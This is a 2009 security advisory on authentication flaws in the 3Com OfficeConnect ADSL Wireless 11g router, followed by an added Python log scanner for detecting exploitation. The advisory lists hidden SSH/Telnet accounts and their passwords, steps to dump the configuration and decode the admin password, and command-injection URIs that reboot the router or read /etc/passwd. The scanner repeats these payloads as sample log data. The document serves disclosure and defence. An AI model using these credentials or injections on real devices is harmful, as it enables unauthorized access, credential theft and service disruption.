

Title 3Com OfficeConnect ADSL Wireless 11g Firewall Router Authentication Multiple Remote Vulnerabilities
Published 2009-10-19-12:00AM
Updated 2009-10-19-07:18PM
Class Access Validation Error
CVE  
Remote  Yes
Local  No
Credit  Andrea Fabrizi
Vulnerable  3Com OfficeConnect ADSL Wireless 11g Firewall Router 3.0
Not Vulnerable  
Code  Attackers can use readily available tools to exploit these issues. These example URIs and proof of concept demonstrate the issues:

1) SSH/Telnet to router using one of these hidden accounts:
support:support
user:5
nobody:admin
2) Type 9
3) Type 1
4) Type 3 to dump the configuration
5) Locate the sysPassword field:
<sysPassword value="cXdlcnR5Cg=="/>
6) Decode the admin password:
roland@hp6720s:~$ echo -ne "cXdlcnR5Cg==" | base64 -d
qwerty

http://www.example.com/utility.cgi?testType=1&IP=aaa || reboot
http://www.example.com/utility.cgi?testType=1&IP=aaa || cat /etc/passwd
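
The two utility.cgi URIs above carry shell syntax in the IP parameter, so logged requests to that endpoint can be checked for IP values that are not a plain host name or address. The following Python is an added example, not part of the original advisory; it assumes Common Log Format lines recorded by a proxy or capture point in front of the router's web interface, and the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line inside a Common Log Format entry (assumed log format).
# ".+?" rather than "\S+" so a URL logged with raw spaces still parses.
REQUEST_RE = re.compile(r'"(?:GET|POST) (.+?) HTTP/[\d.]+"')
# A diagnostic target should be only a host name or an IPv4/IPv6 literal.
SAFE_TARGET_RE = re.compile(r'[A-Za-z0-9.:-]{1,253}')

# Constructed sample lines (documentation address range, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [19/Oct/2009:10:00:01 +0000] "GET /utility.cgi?testType=1&IP=192.0.2.1 HTTP/1.1" 200 512',
    '192.0.2.44 - - [19/Oct/2009:10:02:17 +0000] "GET /utility.cgi?testType=1&IP=aaa%20%7C%7C%20reboot HTTP/1.1" 200 0',
    '192.0.2.44 - - [19/Oct/2009:10:02:40 +0000] "GET /utility.cgi?testType=1&IP=aaa+||+cat+/etc/passwd HTTP/1.1" 200 734',
    '192.0.2.10 - - [19/Oct/2009:10:05:00 +0000] "GET /index.html HTTP/1.1" 200 2048',
]

def suspicious_ip_param(log_line):
    """Return the decoded IP value if it is not a plain host/address, else None."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not url.path.lower().endswith("/utility.cgi"):
        return None
    # parse_qs percent-decodes values, so %7C%7C, %20 and "+" are normalised
    # before the check and encoded variants are caught as well.
    params = parse_qs(url.query, keep_blank_values=True)
    for value in params.get("IP", []):
        if not SAFE_TARGET_RE.fullmatch(value):
            return value
    return None

def scan(lines):
    """Return (line number, client address, decoded IP value) for each hit."""
    hits = []
    for n, line in enumerate(lines, 1):
        value = suspicious_ip_param(line)
        if value is not None:
            hits.append((n, line.split()[0], value))
    return hits

if __name__ == "__main__":
    for n, src, value in scan(SAMPLE_LOG):
        print(f"line {n}: {src} sent IP={value!r}")
```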
Copyright 2007, SecurityDot